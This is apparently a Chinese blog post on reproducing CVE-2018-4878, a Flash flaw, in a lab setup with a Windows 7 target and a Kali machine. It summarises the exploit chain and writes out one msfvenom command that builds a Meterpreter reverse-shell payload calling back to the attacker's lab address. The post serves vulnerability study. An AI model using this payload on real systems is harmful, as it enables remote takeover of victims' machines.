cve-2018-4878漏洞复现

本文档详细介绍了如何复现CVE-2018-4878漏洞,涉及Windows7 SP1系统、旧版Adobe Flash和IE浏览器。首先,使用msfvenom生成shellcode,然后修改工具cve-2018-4878.py,生成exploit.swf和index.html文件。接着,在Kali Linux上启动apache2服务,将文件上传到web目录。最后,使用msfconsole监听模块等待靶机访问,成功后可获得靶机shell。
摘要由CSDN通过智能技术生成

靶机:Windows7 sp1

条件:Adobe Flash 28.0.0.137及其之前的版本     IE8浏览器及以前版本(IE9好像也行)

所需工具已上传

kali:192.168.43.16

(需要输入的命令均用<>标记出来,<>不需要输入)

准备工作:

kali中打开终端,找到下载的cve-2018-4878工具,切换到该路径(这种工具在未来应该尽量由自己写出来)

<msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.16 LPORT=4444 -f python>shellcode.txt>

生成shellcode.txt可以查看kali的shellcode

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值